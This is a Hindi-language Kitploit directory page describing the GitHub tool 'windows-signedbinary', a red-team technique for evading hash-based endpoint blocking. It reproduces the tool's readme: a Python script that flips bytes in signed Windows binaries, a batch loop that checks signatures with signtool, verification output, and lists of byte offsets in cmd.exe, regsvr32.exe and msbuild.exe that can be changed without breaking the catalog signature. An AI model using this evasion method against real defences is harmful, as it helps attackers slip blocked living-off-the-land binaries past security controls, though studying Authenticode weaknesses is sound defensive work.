Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mr-un1k0d3r/windows-signedbinary
हैश विश्लेषणआईडीएस/आईपीएस से बचनारिवर्स इंजीनियरिंगपेनिट्रेशन टेस्टिंगबाइनरी विश्लेषणरेड टीमिंगप्रतिकूल हमला
GitHubmr-un1k0d3r/windows-signedbinary

Windows-SignedBinary

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

हस्ताक्षरित विंडोज़ बाइनरी को इस तरह म्यूटेट करता है कि वैध कैटलॉग हस्ताक्षर बरकरार रहें जबकि फ़ाइल हैश बदल जाते हैं, जिससे हैश-आधारित एंडपॉइंट ब्लॉक बायपास हो जाते हैं और ऑथेंटिकोड सत्यापन की कमियाँ उजागर होती हैं।

रिपॉजिटरी देखें
2596687 साल पहलेKitploit द्वारा समीक्षित

अलग हैश के साथ विंडोज़ साइन्ड बाइनरी जनरेट करें

विचार यह था कि एंडपॉइंट सॉल्यूशन को बायपास किया जाए जो ज्ञात "दुर्भावनापूर्ण" साइन्ड एप्लिकेशन जैसे "regsvr32.exe" को ब्लॉक करते हैं। मैं एक वैध साइन्ड फ़ाइल प्राप्त करने का तरीका खोजना चाहता था जिसका हैश अलग हो।

विश्लेषण

signtool verify /v /a cmd.exe का उपयोग करना

root@kitploit:~
C:\signcheck>signtool verify /a /v cmd.exe

Verifying: cmd.exe
File is signed in catalog: C:\windows\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-
00C04FC295EE}\Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7
601.17514.cat
Hash of file (sha1): 7EB22CBAA74B208DF433C70C06A99280036A52F3

Signing Certificate Chain:
    Issued to: Microsoft Root Certificate Authority
    Issued by: Microsoft Root Certificate Authority
    Expires:   Sun May 09 19:28:13 2021
    SHA1 hash: CDD4EEAE6000AC7F40C3802C171E30148030C072

मैंने सोचा कि "Hash of file" आउटपुट के आधार पर cmd.exe का SHA1 था (7EB22CBAA74B208DF433C70C06A99280036A52F3)

आगे की जाँच से पता चला कि cmd.exe फ़ाइल का SHA1 था

root@kitploit:~
$ sha1sum.exe cmd.exe
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 *cmd.exe

दिलचस्प: एक ही फ़ाइल, 2 अलग-अलग हैश।

टेस्ट फ़ाइलें उत्पन्न करना

इस बिंदु पर मुझे संदेह हुआ कि हस्ताक्षर (signature) फ़ाइल के सभी अनुभागों को शामिल नहीं कर सकता है।

मैंने टेस्ट फ़ाइलें उत्पन्न करने के लिए एक सरल पायथन स्क्रिप्ट लिखी।

root@kitploit:~
import sys

orig = list(open(sys.argv[1], "rb").read())

i = 0
while i < len(orig):
	current = list(orig)
	current[i] = chr(ord(current[i]) ^ 0xde)
	path = "%d.exe" % i
	
	output = "".join(str(e) for e in current)
	open(path, "wb").write(output)
	i += 1
	
print "done"

फिर python generate.py cmd.exe चलाया गया और 300 Gb से अधिक नई फ़ाइलें उत्पन्न हुईं।

अंतिम चरण

अब हमें बनाई गई प्रत्येक फ़ाइल को सत्यापित करना होगा कि वे हस्ताक्षर परीक्षण पास करती हैं या नहीं।

एक सरल बैच फ़ाइल ऐसा कर सकती है

root@kitploit:~
FOR /L %%A IN (1,1,10000) DO (
	signtool verify /v /a %%A.exe
)

बाइनरी 330.exe ने हस्ताक्षर जाँच पास कर ली। इस मामले में फ़ाइल अलग है क्योंकि ऑफ़सेट 330 को संशोधित किया गया था।

root@kitploit:~
C:\signcheck>signtool verify /a /v 330.exe

Verifying: 330.exe
File is signed in catalog: C:\windows\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-
00C04FC295EE}\Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7
601.17514.cat
Hash of file (sha1): 7EB22CBAA74B208DF433C70C06A99280036A52F3
root@kitploit:~
$ sha1sum.exe 330.exe
4c05efb9d67291febe44f8c661db55a1ec06bc41 *330.exe

$ sha1sum cmd.exe
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 *cmd.exe

cmd.exe

निम्नलिखित बाइट्स को हस्ताक्षर को तोड़े बिना संशोधित किया जा सकता है: 330, 331, 408 - 412

regsvr32.exe

निम्नलिखित बाइट्स को हस्ताक्षर को तोड़े बिना संशोधित किया जा सकता है: 320 - 323, 400 - 407

msbuild.exe (x86)

निम्नलिखित बाइट्स को हस्ताक्षर को तोड़े बिना संशोधित किया जा सकता है: 216 - 219

टूल डाउनलोड करें